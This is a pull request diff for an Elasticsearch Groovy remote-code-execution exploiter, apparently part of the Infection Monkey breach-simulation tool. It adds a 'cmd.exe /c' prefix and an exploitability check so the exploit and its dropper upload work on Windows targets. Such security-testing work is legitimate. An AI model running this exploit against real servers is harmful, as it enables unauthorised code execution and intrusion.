### PR TITLE
Elastic windows exploitation bugfix

### DIFF
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py
@@ -8,7 +8,7 @@ import json
 import logging
 import requests
 from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
+from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX
 from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
 
 import re
@@ -34,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE):
         exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
         exploit_config['dropper'] = True
         exploit_config['url_extensions'] = ['_search?pretty']
-        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
+        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX+" "+RDP_CMDLINE_HTTP}
         return exploit_config
 
     def get_open_service_ports(self, port_list, names):
@@ -63,3 +63,20 @@ class ElasticGroovyExploiter(WebRCE):
             return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
         except (KeyError, IndexError):
             return None
+
+    def check_if_exploitable(self, url):
+        # Overridden web_rce method that adds CMD prefix for windows command
+        try:
+            if 'windows' in self.host.os['type']:
+                resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
+            else:
+                resp = self.exploit(url, CHECK_COMMAND)
+            if resp is True:
+                return True
+            elif resp is not False and ID_STRING in resp:
+                return True
+            else:
+                return False
+        except Exception as e:
+            LOG.error("Host's exploitability check failed due to: %s" % e)
+            return False

--- a/monkey/infection_monkey/model/__init__.py
+++ b/monkey/infection_monkey/model/__init__.py
@@ -24,6 +24,8 @@ CHMOD_MONKEY = "chmod +x %(monkey_path)s"
 RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
 # Commands used to check for architecture and if machine is exploitable
 CHECK_COMMAND = "echo %s" % ID_STRING
+# CMD prefix for windows commands
+CMD_PREFIX = "cmd.exe /c"
 # Architecture checking commands
 GET_ARCH_WINDOWS = "wmic os get osarchitecture"
 GET_ARCH_LINUX = "lscpu"


### PR DESCRIPTION
# Fixes
> Elastic wouldn't execute on windows because java needed cmd prefix to understand cmd commands. I added the prefix and tested it on MonkeyZoo